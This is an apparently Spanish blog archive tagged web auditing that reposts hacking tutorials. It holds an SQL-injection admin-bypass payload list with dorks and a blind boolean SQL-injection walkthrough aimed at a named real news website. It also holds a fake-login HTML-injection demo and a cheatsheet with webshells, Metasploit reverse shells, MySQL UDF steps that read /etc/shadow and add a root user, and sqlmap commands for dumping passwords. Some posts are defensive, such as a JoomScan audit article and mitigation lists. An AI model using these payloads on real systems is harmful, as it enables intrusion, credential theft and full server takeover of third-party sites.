Mostrando entradas con la etiqueta Auditoria web. Mostrar todas las entradas
Mostrando entradas con la etiqueta Auditoria web. Mostrar todas las entradas

viernes, 1 de agosto de 2014

Cross site port attack - XSPA

Cross site port attack

como sus propias palabras lo dicen ataca los puertos, es decir hace un escaneo de puerto desde la misma pagina web, esto incluyendo la url con un puerto especifico, ejemplo http://underc0de.org:22/credits.txt en este caso seria escanear el puerto 22, claro esto sabiendo que es una aplicacion vulnerable, lo que seria como si el servidor fuera un proxy y nos analiza el puerto, pueden usar esta aplicacion vulnerable: http://dssnagra.com/store/logs/xspa.php agregando el ejemplo anterior les un error el puerto no esta abierto pero si lo agregan con el puerto 21 funciona bien con bandera es decir el puerto esta abierto :D


ejemplo puerto 21 de underc0de abierto muestra la bandera :D xd

imagen de ejemplo no es mia

en este caso serian ataques externos, pero tambien puede haber ataques internos, como por ejemplo escanear la misma pagina donde estas trabajando, los dispositivos que tiene la maquina, ver la intranet, atacar sqli a una web externa y usar la web vulnerable como proxy, 

imagen que muestra como usan el servidor como proxy XD!

explotar programas locales, leer archivos locales con el uso de el protocolo file:///....

unas imagenes de ejemplo que el autor ataco con este ataque:

ataque de xspa en google

un buffer overflow atacando desde xspa

dispositivo modem dlink router con un ataque xspa

imagen donde lee el /etc/passwd con el protocolo file:///

Todas estas webs pueden ser atacadas por que en realidad lo que hacen es pedir un recurso desde una url externa, por ejemplo:


pide una url externa como recurso, pero claro todos estos ya han sido fixeados por que el autor los reporto....

ahora como se pueden arreglar esta vuln?

primero que nada validando el content-type
mostrar los mensajes de errores - por ejemplo: informacion invalida
restringir ciertos puertos
bloquear ips con blacklist y whitelist - aqui se puede incluir las ips de la misma intranet
bloqueando protocolos como file:/// ftp:// si no quieren que entren esta claro

bueno este no es un tutorial nunca tratara de serlo solo es una breve descripcion, si quieren ver el tutorial de verdad, aqui les dejo las tres partes del autor definitivamente bien descriptivas :D

Enlaces


y el video del autor que les prometi xD

Video


Fuente: http://underc0de.org/foro/index.php?topic=13476.0

[SQL] Bypass Admin Panel

Bueno como dice hoy are un tutorial sobre el bypass admin panel (SQL) ,es decir, bypasear  panel (admin)

algunos dorks 

Dorks : 


inurl:adminlogin.aspx
 inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp


lo aremos con una simple consulta SQL 
,,,

Acá una imagen (mía)




algunos tipos de consultas :

‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –


Fuente: http://underc0de.org/foro/index.php?topic=18601.0

Explotation Blind Boolean Based [SQL Injection]

1.- ¿Qué es una "Blind SQLi Boolean Based"?

Si se pueden fijar en el nombre, este mismo se los dice todo. Cuando decimos "Boolean based" nos referimos a que está se basa en valores booleanos, es decir, true or false/verdadero y false. Y cuando digo "Blind" Me refiero a que la Inyección es a ciegas, es decir, no nos muestra alguna señal de error.

La única forma de extraer datos que se encuentren en la currente base de datos, sería usando el modo brute force, es decir, adivinando.

2.- Explicando dos funciones importantes

Una de las funciones más comúnes que usamos al momento de explotar una Blind Boolean Based, es ascii() , con este devolvemos algún carácter válidado de la tabla "ASCII" (si no me equivoco).

Otro vendría siendo substring() con esta devolvemos una subcadena de otra subcadena.

4.- Comprobando si el sitio es vulnerable

Existen algunas formas para comprobar si el sitio web que tenemos en las manos es vulnerable a una Blind SQLi Boolean Based, podemos usar la sentencia "AND" , seguidamente alguna operación, que de como resultado un valor verdadero o uno falso (booleanos), true or false, por ejemplo, podemos usar AND 1=1 , lo cúal vendría siendo igual a True/Verdadero, ya que 1 es igual a 1 :D.

Y si coloco, and 1=0 , me debería dar un resultado false/falso , ya que 1 no es igual a 0. Un ejemplo en un sitio web:

http://trujilloenlinea.com.ve/noticias.php?seccion=Regionales&id=19350' and 1=1 -- -

Como pueden observar, al final coloque un "-- -" , lo que es un comentario, el servidor solo lee lo que está entre la ' y el comentario -- -es decir, and 1=1 :D.  Todo lo que vaya luego de -- - el servidor no lo leera.

Y bueno, como pudieron observar en la página del sitio, se reflejo todo el texto de la noticia, ya que nos dio un resultado como true. Y ahora, si yo uso "and 1=0" me devolvería un resultado falso, ya que 1 no es igual a 0 como lo dije anteriormente, ejemplo:

http://http://trujilloenlinea.com.ve/noticias.php?seccion=Regionales&id=19350' and 1=0 -- -

Y esto nos da señal de que es vulnerable :D.

Aparte de usar "AND" también podemos usar "having" , que sería otra de las alternativas. es decir, reemplazamos el and y colocamos having, ej:

http://trujilloenlinea.com.ve/noticias.php?seccion=Regionales&id=19350' having 1=1 -- - ;D.

Otra alternativa es, "DIV" , reemplazamos el having o el and y colocamos div , ejemplo:

http://trujilloenlinea.com.ve/noticias.php?seccion=Regionales&id=19350' div 1=1 -- - .

4.- Explotación de la vulnerabilidad

La primera fase para explotar la vulnerabilidad, sería extraer el nombre de la base de datos, para ello, iremos búscando el nombre de la DB carácter por carácter.., haciendo uso de la función database(), ejemplo:

http://trujilloenlinea.com.ve/noticias.php?seccion=Regionales&id=19350' and ascii(substring(database(),1,1))=116 -- -

Ok, explico, con esto le estoy preguntando al servidor si el primer carácter de la base de datos empieza por 116, en dónde 116 corresponde a "t" en la tabla ascii, entonces, el servidor me dara una respuesta basada en valores booleanos, es decir, si el primer carácter SI empieza por la letra t este me devolvera true, de lo contrario me devolvera false :D. Por ejemplo, si hago lo siguiente:

http://trujilloenlinea.com.ve/noticias.php?seccion=Regionales&id=19350' and ascii(substring(database(),1,1))=115 -- -

Me devuelve false, es decir, el primer carácter no comienza por la letra "s" la cual en decimal corresponde a 115, (está en la tabla ascii). Les dejo la siguiente que se apoyen más adelante:



Ok, ya yo por defecto se que el nombre de la db es "truji1_noticias", ya que le he hecho un escáneo al sitio :D.

Entonces, ustedes pueden ir aumentando el número de los carácteres y ir búscando letra por letra, aumentando de 1,1 , 2,1 y así sucesivamente. Aunque pueden llegar a aburrirse y duren mucho.

Ahora podemos seguir a extraer los nombres de las tablas existentes de la DB, para ello, hacemos lo siguiente:

http://trujilloenlinea.com.ve/noticias.php?seccion=Regionales&id=19350' and (select count(*) from noticias) -- -

Como pueden observar, aquí le estoy preguntando si hay una tabla llamada noticias y me devuelve un resultado como true, es decir, SÍ, hay una tabla llamada noticias en la base de datos :D. Y use select count(*) con un * ya que aún no tenemos las columnas de esa tabla:D

Ustedes pueden colocar luego de from el nombre de una tabla y este se encargara de verificar si está existe.

Ahora, el siguiente paso sería averiguar los nombres de las columnas de la currente tabla, para ello, reemplazamos el * por el nombre de la columna a verificar si existe, ejemplo:

http://trujilloenlinea.com.ve/noticias.php?seccion=Regionales&id=19350' and (select count(id) from noticias) -- -

Con esto, le estoy preguntando si existe una columna llamada "id" en la tabla "noticias", y esto me devuelve como resultado true :D, es decir, que si existe una columna con el nombre "id", así podemos ir reemplazando nosotros y búscando nombre por nombre cada columna, ejemplo:

http://trujilloenlinea.com.ve/noticias.php?seccion=Regionales&id=19350' and (select count(fecha) from noticias) -- -

Reemplaze id y puse fecha, y este me dice que si existe una columna con ese nombre jeje ;D

La última fase vendría siendo la obtención de los datos de cada tabla, para ello, usaremos los siguiente:

http://trujilloenlinea.com.ve/noticias.php?seccion=Regionales&id=19350' and ascii(substring((select id from noticias limit 0,1),1,1))=49 -- -

Entonces, con esto le pregunto al servidor si el primer carácter de la primera fila de la columna "id" es 1 , lo cúal significa 49 en decimal :D, y así podremos ir búscando carácter por carácter hasta ir obteniendo los datos reales, aumentando el limit de 0,1 a 1,1 a 2,1 y así sucesivamente ;-). Y si queremos pasar a la siguiente fila, cambiamos el 1,1 por 2,1 y así vamos ;D

Y bueno, eso ha sido todo, espero les haya gustado el tutorial y lo hayan logrado entender.

Fuente: http://underc0de.org/foro/index.php?topic=19001.0

miércoles, 23 de julio de 2014

Auditando un servidor web Joomla con Joomscan

El amplio uso de CMS o sistemas de gestión de contenidos a lo largo de Internet ha despertado el interés de los ciberdelincuentes para aprovechar vulnerabilidades en los mismos. De esa forma, utilizan plataformas como Joomla, para propagar códigos maliciosos. Es importante, en esta instancia, evaluar el nivel de seguridad de estas plataformas web.

¿Qué es Joomla?

Joomla es un sistema de gestión de contenidos que permite desarrollar sitios web dinámicos de una forma sencilla. Es ampliamente utilizado debido a la gran cantidad de características que posee así como también por la sencillez a la hora de utilizarlo. Además, existe una gran cantidad de plugins que pueden utilizarse para complementar las funcionalidades de las que dispone nativamente.

¿Qué es necesario tener en cuenta a la hora de utilizar Joomla?

En primera instancia, siempre es recomendable contar con la versión más actual de este sistema de gestión de contenidos. Esto se debe a que versiones actuales solucionan problemas de seguridad en versiones anteriores. Otro aspecto a tener en cuenta son los plugins utilizados ya que muchos de ellos poseen vulnerabilidades que pueden ser utilizadas por los atacantes. Previamente, se ha visto algo similar con otros CMS. Un ejemplo claro fue la vulnerabilidad en el módulo Count Per Day de WordPress. Otro ejemplo fue cuando WordPress se utilizó como vector de propagación de Flashback.
A fin de conocer el nivel de seguridad de Joomla y evitar que un sitio web sufra este tipo de infección, existen formas de poder evaluar la seguridad de la plataforma y de los plugins instalados.

¿Qué herramienta puede utilizarse para auditar Joomla?

Anteriormente, explicamos como auditar la seguridad de WordPress con WPScan. En este caso, existe una herramienta que puede ser utilizada para Joomla conocida como JoomScan. Esta herramienta posee características que le permiten al usuario evaluar cuál es el nivel de seguridad de los plugins instalados así como también de la propia versión de Joomla.
Para ejecutar la herramienta hay que introducir el siguiente comando:
./joomscan.pl –u [direccion URL del sitio]
De esa manera, se obtiene una respuesta con información detallada. En primera instancia, Joomscan intenta averiguar la versión exacta que se encuentra instalada en el servidor. Además provee información sobre la versión de PHP así como también detalles sobre el tipo de servidor. A continuación puede observarse una captura donde se visualiza esta funcionalidad:
Versión JoomlaVersión Joomla
Otro dato importante que analiza esta herramienta son los plugins instalados. Tal como se especificó anteriormente, existen muchas vulnerabilidades asociadas a plugins desarrollados por terceros. Teniendo en cuenta esto, la herramienta también realiza un chequeo sobre vulnerabilidades conocidas e informa si el servidor es vulnerable. Además, indica todas las versiones que son vulnerables y brinda una dirección URL donde se puede encontrar más información. A continuación puede observarse una captura con información sobre vulnerabilidades:
Vulnerabilidades Joomla
Es importante evaluar la seguridad de este tipo de plataformas para que no se conviertan en blanco de ciberdelincuentes o sean utilizadas para propagar malware. Es importante recordar que una vulnerabilidad puede comprometer el sistema a nivel general. Debido a esto, la seguridad debe gestionarse y por eso desde ESET Latinoamérica contamos con la unidad de ESET Security Services, donde brindamos diferentes tipos de auditorías de seguridad.


Fernando Catoira
Analista de Seguridad

Autor Fernando Catoira, ESET

http://www.welivesecurity.com/la-es/2013/01/21/auditando-un-servidor-web-joomla-con-joomscan/

martes, 22 de julio de 2014

HTML Injection (ingles)

HTML Injection is a vulnerability which occurs in web applications that allows users to insert html code via a specific parameter for example or an entry point. This type of attack can be used in combination with some sort of social engineering in order to trick valid users of the application to open malicious websites or to insert their credentials in a fake login form that it will redirect the users to a page that captures cookies and credentials. In this tutorial we are going to see how we can exploit this vulnerability effectively once it is discovered. For the needs of the article the Mutillidae will be used as the vulnerable application.
Let’s say we have a page like the following:

Vulnerable Form
Vulnerable Form

Of course in this example there is an indication that this form is accepting HTML tags as it is part of the functionality of the application. A malicious attacker will think that he can exploit the users of this application if he set up a page that is capturing their cookies and credentials in his server. If he has this page then he can trick the users to enter their credentials by injecting into the vulnerable page a fake HTML login form. Mutillidae has already a data captured page so we are going to use this page for our tutorial.
Mutillidae - Data Capture Page
Mutillidae – Data Capture Page

Now we can inject HTML code that it will cause the application to load a fake login form.
Injecting HTML Code - Fake Login
Injecting HTML Code – Fake Login

The next image is showing the fake login form:
Fake Login Form
Fake Login Form

Every user that will enter his credentials it will redirected to another page where his credentials will stored. In this case the credentials can be found at the data capture page and we can see them below:
Credentials
Credentials

Conclusion

As we saw in this article HTML injection vulnerabilities are very easy to exploit and can have large impact as any user of the web application can be a target. System admins must take appropriate measures for their web applications in order to prevent these type of attacks.

Fuente: http://pentestlab.wordpress.com/2013/06/26/html-injection/

miércoles, 2 de julio de 2014

WDivulge, Descubriendo carpetas y archivos ocultos

En las auditorías webs, es esencial poder usar alguna herramienta del tipo “enumeración”. Esto nos sirve para encontrar paneles de administración, directorio con información sensible. E incluso directorios con permisos incorrectos que permitan listar archivos.
Descargamos la herramienta y vemos que listas de archivos va a buscar.
darkmac:lists marc$ more files.txt“pictures”[###]\”.jpg”“DCP_”[####]\”.jpg”“IMG_”[####]\”.jpg”“”[##]\”.jpg”“dsc”[#####]\”.jpg”“dscn”[####]\”.jpg”“mvc-”[###]\”.jpg”“mvc”[#####]\”.jpg”“P101″[####]\”.jpg”“IMG_”[###]\”.jpg”“IMAG”[####]\”.jpg”“_MG_”[####]\”.jpg”“dscf”[####]\”.jpg”“pdrm”[####]\”.jpg”“IM”[######]\”.jpg”“EX”[######]\”.jpg”“pict”[####]\”.jpg”“P”[#######]\”.JPG”“IMGP”[####]\”.JPG”“PANA”[####]\”.JPG”“Image(“[##]\”).JPG”“DSCI”[####]\”.JPG”“PICT”[#####]\”.jpg”“HPIM”[####]\”.jpg”“DSCN”[####]\”.jpg”“DSC”[#####]\”.jpg”“IMG_”[#####]\”.jpg”darkmac:lists marc$
Podemos modificar esta lista y añadir las nuestras.
Lanzamos la herramienta contra un servidor web en un entorno controlado.
La petición que hará la herramienta es la siguiente:
“GET /pictures298.jpg HTTP/1.1″
Si queremos ver que peticiones se están originando realmente, podemos ver los logs de la parte de servidor
Como véis la herramienta va probando las distintas combinaciones, si por ejemplo quisiéramos bloquear este fuzzer, podríamos configurar algo como:
#Block scanners      BrowserMatch ^wdivulge deny_host     Deny from env=deny_host  
Ya tenemos una herramienta mas para nuestro arsenal!

Fuente: http://www.flu-project.com/2013/04/wdivulge-descubriendo-carpetas-y_1.html

martes, 17 de junio de 2014

Web Application exploitation - a cheatsheet (ingles)

This is a work in progress. Additions, suggestions and constructive feedback are welcome.
The purpose of these cheatsheets is to, essentially, save time during an attack and study session.

[Last edited:2013-06-18]

WebShell Backdoors
Minimal php command shells
file cmd.php: PHP script text =>

or

Example usage via Remote File Include (RFI):
http:///index.php?cmd=&page=http:///cmd.php
Null Bytes (‰00 - html code ampersand, hash 137, 00) may also assist in some cases:
http:///index.php?cmd=&page=http:///cmd.php

e.g.
http:///index.php?system=../../../../../etc/passwd.html
Encoding windows reverse command shell as asp
msfpayload windows/shell_reverse_tcp LHOST= LPORT= R | msfencode -t asp -o .asp
Encoding meterpreter in asp
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= R | msfencode -t asp -o .asp
------
attacker msfconsole:
use multi/exploit/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 
set LPORT 
exploit


http://stackoverflow.com/questions/3115559/exploitable-php-functions


------------------------------------------------------------------------------------------------------------------
Encoding and Decoding - for backdoors, injection, and (de)obfustication
http://www.asciitohex.com/
http://home.paulschou.net/tools/xlate/
http://www.idea2ic.com/PlayWithJavascript/hexToAscii.html

Burp Suite (Decoder module)
http://portswigger.net/burp/help/decoder.html

Decode base64 standard input 
base64 -d 
 
^D

Javascript deobfustication
http://www.javascriptbeautifier.com/
http://jsbeautifier.org/
http://vitzo.com/en/tools/javascript/javascript-beautifier

------------------------------------------------------------------------------------------------------------------
Specific Web applications
Joomla
Joomla default database configuration filename
/configuration.php
Scanning Joomla! for plugins and versions
/pentest/web/scanners/joomscan/joomscan.pl -u
/pentest/enumeration/web/cms-explorer  -url  -type joomla

WordPress
WordPress default database configuration filename

WordPress default login page
/wp-login.php
WordPress plugins
/wp-content/plugins
Scanning WordPress for plugins and versions
/pentest/web/wpscan/wpscan.rb --url ; --proxy -enumerate [u|p|v|t] 

/pentest/enumeration/web/cms-explorer  -url  -type wordpress
Newer WP: "Themes" can be uploaded as zip files by WP administrators i.e. you:
mkdir wpx
vi wpx/cmd.php
cat wpx/cmd.php

zip -r wpx.zip wpx
upload wpx.zip via web interface as an installed theme
Command execution access is via: 
/wp-content/plugins/wpx/cmd.php?cmd= 
Older WP: Webshells can be added by editing exiting files/themes via the web interface or by enabling file upload and permitting the valid file extension (e.g. .php)

Cacti
Cacti default database configuration filename
/include/config.php


DeV!L`z ClanPortal
DeV!L`z ClanPortal default database configuration filename
/inc/mysql.php

Drupal
Drupal default database configuration filename
/sites/default/settings.php

Scanning Drupal for plugins and versions
/pentest/enumeration/web/cms-explorer  -url  -type drupal
PHPMyAdmin
/phpmyadmin/changelog.php
Timeclock
Timeclock default database configuration filename
/db.php


Default files to check for additional paths
lt;target-webpath>/robots.txt
lt;target-webpath>/style.css

------------------------------------------------------------------------------------------------------------------
SQL Terminators/Comments
MSSQL and MySQL:
;--
MySQL:
;#


Login Pages Basic SQL injection 
MS IIS
' OR '1=1';--

MySQL
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1;#

Enumerate number of columns/fields
...UNION SELECT 1;--
...UNION SELECT 1,2;--
...UNION SELECT 1,2,3;--

Load file by injecting into the vulnerable field - encode string if necessary
…UNION ALL SELECT NULL,LOAD_FILE(‘’),NULL,NULL;-- …UNION ALL SELECT NULL,LOAD_FILE(‘’),NULL,NULL INTO OUTFILE ‘’;--

Dump/Write to file
(see encode text/shell to hex, base64)
...SELECT * FROM mytable INTO DUMPFILE ’; —
...SELECT * FROM mytable INTO OUTFILE ‘’; —

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

http://ferruh.mavituna.com/sql-injection-cheatsheet-oku

MySQL <5 .0="" defined="" functions="" span="" user="">
command execution and privilege escalation with mysql running as root/SYSTEM
mysql> use mysql;
mysql> create table (line blob);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into  values(load_file('');
Query OK, 1 rows affected (0.00 sec)
mysql> select * from  into dumpfile '/usr/lib/lib_mysqludf_sys.so';
Query OK, 1 rows affected (0.00 sec)
mysql> create function returns int soname 'lib_mysqludf_sys.so';
Example command execution with the new function:
mysql> set @status := ('cat /etc/shadow > /tmp/shadow');
Query OK, 0 rows affected (0.06 sec)
mysql> set @status := ('/usr/sbin/useradd -o -u0 -g0 -d /dev/null -s /bin/bash &new-username>');
Query OK, 0 rows affected (0.06 sec)
mysql> set @status := ('echo : | /usr/sbin/chpasswd');
Query OK, 0 rows affected (0.06 sec)
or
mysql> select ('/usr/sbin/useradd -o -u0 -g0 -d /dev/null -s /bin/bash &new-username>');
+----------------------------------------------------------------------------------------------------------------------------------------------------------+
('/usr/sbin/useradd -o -u0 -g0 -d /dev/null -s /bin/bash &new-username>'); |+----------------------------------------------------------------------------------------------------------------------------------------------------------+
| 4294967296                                                                                                                                       |
+----------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (1.70 sec)
SQLMap commands


cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" -p --banner --current-db --current-user --is-dba

Enumerate User Passwords
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --passwords

List of Databases
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --dbs

Retrieve tables from specific Database
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --tables -D

Dump specific table contents
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --dump -D -T

Retrieve system /etc/password file
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=/etc/passwd

Retrieve apache2 configuration file to identify live website config files
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=/etc/apache2/apache2.conf

Retrieve default configuration file to subsequently identify Document Root (web directory location)
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=/etc/apache2/sites-enabled/000-default

Retrieve CMS/Web app default configuration file if possible
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=//


Other interesting flags:
--check-waf         Check for existence of WAF/IPS/IDS protection - implementation of nmap http-waf-detect nse script


Some logfile Misdirection flags:
--random-agent      Use randomly selected HTTP User-Agent header
--safe-url=   Url address to visit frequently during testing
--safe-freq=  Test requests between two visits to a given safe url
--mobile            Imitate smartphone through HTTP User-Agent header

------------------------------------------------------------------------------------------------------------------

Basic Client-side attacks
XSS - iframe



XSS - javascript




References and sources also include:
http://g0tmi1k.blogspot.com
http://ha.ckers.org/sqlinjection/

Fuente: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html